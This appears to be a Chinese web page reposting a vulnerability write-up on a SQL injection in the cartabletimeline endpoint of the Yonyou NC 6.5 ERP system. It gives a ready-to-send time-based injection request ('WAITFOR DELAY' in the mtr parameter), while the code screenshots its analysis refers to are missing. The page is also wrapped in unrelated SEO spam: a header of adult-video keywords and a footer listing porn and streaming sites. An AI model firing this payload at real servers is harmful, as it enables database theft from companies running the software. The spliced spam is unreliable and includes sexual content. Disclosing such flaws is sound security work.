日韩欧美国产精品免费一二-日韩欧美国产精品亚洲二区-日韩欧美国产精品专区-日韩欧美国产另-日韩欧美国产免费看-日韩欧美国产免费看清风阁

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

用友NC 漏洞分析--cartabletimeline存在SQL注入

admin
2025年4月9日 0:6 本文熱度 142

用友NC是一款大型erp企業管理系統與電子商務平臺;用友網絡科技股份有限公司用友NC存在SQL注入漏洞,攻擊者可利用該漏洞獲取數據庫敏感信息。                    


漏洞描述


   用友NC是一款大型erp企業管理系統與電子商務平臺。用友網絡科技股份有限公司用友NC存在SQL注入漏洞,攻擊者可利用該漏洞獲取數據庫敏感信息。 影響版本如下

用友NC6.5漏洞分析

VsmAction類中此處存在@Servlet注解,也就是說當訪問路徑為/cartabletimeline會直接定位到這里。

跟進getVehicleApplyInfo方法接口類ICarTalbeService,定義了getVehicleApplyInfo方法

找到接口類ICarTalbeService的實現類CarTableServiceImpl

跟進getgetUserVehicleApplyInfo方法

跟進queryVOs方法

漏洞復現(自測)

GET /portal/pt/cartabletimeline/doList?pageId=login&mtr=1)WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: x.x.x.x:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=778E1EE003971592F31449220834A1AE.server
Priority: u=4



本文已2024-11-27

發布qax攻防社區:https://forum.butian.net/article/627

所以本文只做簡寫,可查看原文



閱讀原文:原文鏈接


該文章在 2025/4/9 12:03:36 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 91九色露脸 | 最新版本直播app | 国产精品边做奶水狂喷 | 亚洲一区播放 | 区三区在线观看 | 播放日韩 | 精品午夜福利在线视在亚洲 | 国产精品多人 | 国产精品福利在线观看 | 精品午夜福利在线观看 | 在线观看视频国产 | 91免费国产在线观看尤物 | 秋霞手机免费 | 九九在线免费视频 | 三极网站 | 欧美一区二区电影免费观看 | 午夜福利电影网 | 好看的电影电视剧在线观看 | 亚欧成人中文字 | 国产精品日韩欧美制服 | 国产色秀精品综合 | 91免费网站| 国产91丝袜高跟系列 | 妖精视频| 天美传媒、91制片厂、天美传媒 | 成视人a | 国产一区二区免费播放 | 韩国日本亚洲欧洲一区二区三区 | 怡红院在线a男人的天堂 | 日本动漫精品一区二区三区 | 国产欧美一级精品 | 久热在线精品视频观看 | 日韩又爽又黄 | 欧美1区2区3区| 国产拍精品亚洲国产高清 | 欧美最猛黑人xxxxx猛交 | 最近中文字幕高清一区二区 | 精品国产免费人成网站 | 亚洲免费影视乱伦 | 亚洲中字幕日产aⅴ | 国产在线视频 |